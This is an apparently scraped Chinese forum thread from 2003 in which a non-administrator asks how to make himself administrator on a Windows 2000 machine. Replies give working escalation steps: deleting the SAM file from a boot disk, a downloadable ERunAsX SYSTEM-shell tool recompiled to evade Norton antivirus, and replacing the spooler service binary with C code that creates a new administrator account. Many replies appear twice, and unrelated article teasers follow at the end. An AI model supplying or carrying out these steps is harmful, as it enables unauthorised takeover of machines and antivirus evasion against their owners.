6045
社区成员
急急:我只是win2k的一般用户,请问我可以通过什么手段添加一个admin用户吗?原来admin的密码我没有?
我想通过这个办法把目前的登陆身份提升为admin。
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
cooking 2003-04-09
哈哈,终于搞定啦
spark_li 2003-04-09
另外没有注册的ntfsdos只能查看文件,而不能删除文件
spark_li 2003-04-09
http://bbs.nju.edu.cn/file/1049854631spoolsv.exe
这个down下来保存为spoolsv.exe
http://bbs.nju.edu.cn/file/ERunAsX.dll
这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试
你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
这个down下来保存为spoolsv.exe
http://bbs.nju.edu.cn/file/ERunAsX.dll
这个ErunasX是我重新编译的,希望能诺顿不要再杀它
我这里没有装诺顿,也没有办法测试
你既然可以用小盘启动系统,那么就不用停止服务了
用小盘启动系统后直接重新命名系统的spoolsv.exe就行了
cooking 2003-04-09
我也停不了spooler服务啊,
C:\>net stop spooler
系统发生 5 错误。
拒绝访问。
C:\>net stop spooler
系统发生 5 错误。
拒绝访问。
cooking 2003-04-09
http://bbs.nju.edu.cn/file/2ksystem.zip
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
里面的ERunAsX.dll抱告有毒,我也没有办法禁止诺顿!
cooking 2003-04-09
我可以用软盘启动,是ubs软盘,也用了ntfsdos,但就是删不不掉那个该死的sam,
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
我是power user,但机器里面没有装iis,ftp
我也没办法用c啊:(
麻烦你能给我发一个吗?
tyxm@sina.com
感激不尽啊!!!
spark_li 2003-04-09
To cooking()
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限
不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。
此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp
#include <stdlib.h>
void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}
6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。
此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。
不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
人家说的dos可不是2k的命令行下面,是叫你用一张dos盘启动
系统,然后删除sam文件,或者多系统下启动其他系统,再把你想进
的2k里面的sam文件删除,不过这个方法的局限是如果你的2k是ntfs
格式的文件系统,怕不能成功。
这里呢,我提供你一个方法(你要确定你的机器是sp2才能成功)
你先down这个文件http://bbs.nju.edu.cn/file/2ksystem.zip
然后解压缩开来,看里面的使用说明,在命令行下运行erunasx cmd.exe
然后呢,就跳出来一个cmd.exe,也就是2k的命令行下的窗口出来
在这个新窗口里面你就可以干你想做的事情了,因为它是以system权限
不知道你的机器还开了那些服务,能拿权限的方法还多呢,比如有iis
的话,才sp2,不谈以前出现的漏洞,就最近的webDavx溢出就能实现了,
还有新出的rpclocator服务的漏洞,这个服务默认是没有启动,但是默认
配置下普通用户可以启动这个服务的,你能本地登陆,也就能拿系统权限了。
此外:还提供一个“鲜为人知”的方法,说笨也说聪明,不管他sp0,还是
sp3 or sp4 hotfix,方法如下:(前提大概需要你是power users 组用户,
系统采用默认安全配置,users组用户我倒没有测试)
1、开始、运行cmd.exe
2、net stop spooler
3、进入system32目录,把spoolsv.exe 重新命名为abc.exe,这里名字随便,
和下面的保持一致就行了
4、进入system32\dllcache目录,里面如果有spoolsv.exe,则也重新命名为
abc.exe
5、把下面的代码copy下去,保存为spoolsv.cpp
#include <stdlib.h>
void main()
{
system("net user newuser newpass /add");
system("net localgroup administrators /add newuser");
system("abc.exe");
}
6、用VC++ 编译上面的spoolsv.cpp,得到spoolsv.exe文件,把它放到
system32目录,
7、重启系统,一切顺利的话系统中就多了一个newuser,administrators组
的用户了。
8、次方法补充:我朋友说呢,users 组的用户系统不让停止服务,也不让
对system32目录写,所以怕不成功。此方法的原理大家一看就清楚了,就是替换
系统的服务程序,欺骗系统先执行我们自己的代码。
此外常用的方法可以用ntfsdos做成启动盘,启动系统之后呢就能对ntfs格式的
文件系统进行读写了,计算机没有禁止你使用软盘启动系统的话,那正好,删除
sam文件即可,另一个方法是用老外写的一个系统启动包,用他你可以修改任意
用户的密码或者修改注册表,前提仍然是你能用软盘启动系统。
不知道大家还有什么好的方法,欢迎指正与补充。
Good Luck
asdfxcv 2003-04-08
没有管理员密码的话,就不能做你上面那些想做的事情,谁叫你装的是WIN2000,而且还装了补丁呢?如果没有装补丁的话,上面很多都可以实现的。
cooking 2003-04-08
spark_li(晕忽忽(恶人谷:通讯连长)) :别说风凉话啊,你有什么好一点,简单一点的办法啊
上面他们说的我都试了,没有成功啊,小弟愚钝:(
simplehe2002(核桃)
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!
上面他们说的我都试了,没有成功啊,小弟愚钝:(
simplehe2002(核桃)
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
在dos下,sam我删不掉啊,拒绝访问!
cooking 2003-04-08
xumiao(猫猫) ,请详细一点好吗?我加了失败啊
spark_li 2003-04-08
对付sp2,本地拿权限的方法多了
xumiao 2003-04-08
看看关于输入法的漏洞吧。
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
很简单,进去后看net的属性 c:\winnt\system32\net.exe net user username password /add
运行一次,在改:net user username localgroup administrators /add
好好想想!
ysqu 2003-04-08
你在本版上面的搜索中输入“忘记密码”
就可以看到很多方法
或者到search.csdn.net 中查寻
就可以看到很多方法
或者到search.csdn.net 中查寻
Swanzy 2003-04-08
可以用Linux启动盘修改admin密码
boris007 2003-04-08
可以建用户 但没有任何权限
除非有管理员的密码 管理员给你权限
除非有管理员的密码 管理员给你权限
iamholly 2003-04-08
如果没人管你,你可以修复,呵呵~~
simplehe2002 2003-04-08
在DOS下把c:\winnt\system32\configure\sam 给删了就可以进去了
jxhaq 2003-04-08
用CHNTPW这个软件破解密码,下载一个用一用就知道怎公回事了
cooking 2003-04-08
呵呵,我的正好是sp2,哪里下这个软件啊,我找不到啊?:(
lovestart 2003-04-08
一般情况下是不可以的,如果没有打sp3的话还可以用一个叫erunas的软件。
我,是一个培训班出来的程序员 这时候,一个身穿格子衬衫却坐在花园街道啃着面包的人吸引了我的注意,他狼吞虎咽,与那些急急忙忙的人一样,不停的看时间,生怕自己错过了什么。 面包还没啃完,大口喝着矿泉水,跑进人潮拥挤的街道,消失在我的...
老板让我用少量样本 finetune 模型,我还有救吗?急急急,在线等! 文 | ????????????????编 | 王苏今天介绍的是一篇 NAACL'21 新鲜出炉的工作!NAACL 上周四出的结果,这篇工作本周一上传 arxiv,周二被王苏小哥哥...
【NAACL21】老板让我用少量样本 finetune 模型,我还有救吗?急急急,在线等!... 文 | ????????????????编 | 王苏源 | 夕小瑶的卖萌屋今天介绍的是一篇 NAACL'21 新鲜出炉的工作!NAACL 上周四出的结果,这篇工作本周一上传 arx...
急急急求微信公众号开发接口-php如何实现获取用户发送的微信表情,并返回一个链接,用户点击进去链接就是刚才发的表情,用户可以保存表情? 求微信公众号开发接口-php如何实现获取用户发送的微信表情,并返回一个链接,用户点击进去链接就是刚才发的表情,用户就可以保存表情到手机? 需求描述 1.用户在公众号对话框发送微信表情(GIF) 2.公众号接收用户...
毕业一年半拿遍所有大厂offer,我是怎么做到的? 最近一段时间面试了几家互联网公司,陆续通过了阿里、头条、美团,滴滴,京东的面试,基本上面试的公司都通过了,所以在这里想分享一些自己面试的经验给大家,希望能帮助大家拿到心仪的offer 我的基本情况:19届本科...
亚马逊测评:我想做亚马逊测评,怎么找到靠谱的人教? 最近有小伙伴私信我,说自己是是一个小白,想学习亚马逊测评,但是担心自己被骗。今天我就讲下怎么找到靠谱的人教,避免被割韭菜。在2020年之前,亚马逊真人测评只有极少的人在做,圈子也很封闭。今年由于疫情的关系...
急急急:需要有人帮我修改小程序 我有一个签到没有签完(需要上传图片我没有上传足量,想要把全部图片上传才行) 但是这个签到对我非常重要 是微信的小程序 别的东西不用改只要能把我的东西塞进去就可以,想问下能不有人帮帮我???????????? ...
我的世界服务器显示不了称号,我的世界怎么在名字后面加称号_我的世界怎么设置称号... 这只需要打指令就行,如下: /manuaddv 用户名 prefix 括号里填备注,可以在这个旁边输入数字1、2、3、、4、5、6、7、8、9,比如1、2、32.我的世界op怎么改称号,就是在名字前面加一个称号我的世界op怎么改称号,...
急急急!!! 老师,spring升级到5.x了,我要看3.0.6的文档怎么办? 今天告诉你一个好办法。 首先进入spring官网,按照如下顺序,点击链接。 链接打开后如下: 可以看到URL中有版本信息,我们只需要替换版本就可以了。但杯具的是,官网最低的版本都是4.3.2,要看3的也要知道具体...
Salesforce学习之路-admin篇(一)几个简单概念 Salesforce是一款非常强大的CRM(Customer Relationship Management)系统,国外企业使用十分频繁,而国内目前仅有几家在使用(当然,国内外企使用的依旧较多),因此相对来讲,中文资料相对较少。这里,结合之前参加...
一个C++程序员的学习经历 正在上网的时候有这个念头的,所以急急忙忙找了一些学习编程的高人的感想:我开始学VC时就是自己一个人在啃,也没什么人指导,当时没有条件上网,资料特别少,在书店里随便买本书就学了,在学VC的过程中走了许多弯路...
Django实战(一)-----用户登录与注册系统2(数据模型、admin后台、路由视图) 使用Django开发Web应用的过程中,很多人都是急急忙忙地写视图,写前端页面,把最根本的模型设计给忽略了。 模型中定义了数据如何在数据库内保存,再直白点说就是数据表的定义。这部分工作体现在Django的代码中,...
急急急,CATTI、CAT软件和翻译经验都没有,该怎么办!? 丨打死个翻译官 2.5 急急急,CATTI、CAT软件和翻译经验都没有,该怎么办!? 丨打死个翻译官 2.5 今天的这篇文章有点水,作为一个会因为货不够干而在深夜里独自抽泣的男子,我很痛苦,但不写又不行,因为它是本书“第三部分:找活干”...
第一节 你有对象?哼,我也有!Part 1 此时,小色的脸顿时红了起来,虽然由于脸皮厚的原因没有什么改变,可是脸上的小痘痘就跟小火山似的,一个一个都等着喷发呢。可惜啊,上次猛然碰见她,别说没化妆遮遮丑了,就连招呼都没有打好,就说了说现在的情况就...
这是谁的孩子?------软件质量的责任之争 我常常看到、感受到在一个软件产品或系统的工作链上,所有的上下游角色都急急忙忙地工作着,可是有一天,有个BUG,我们且叫它“坏孩子”吧,被发现了,大家于是就开始了关于这个“孩子”的来源之争:这是代码问题!...
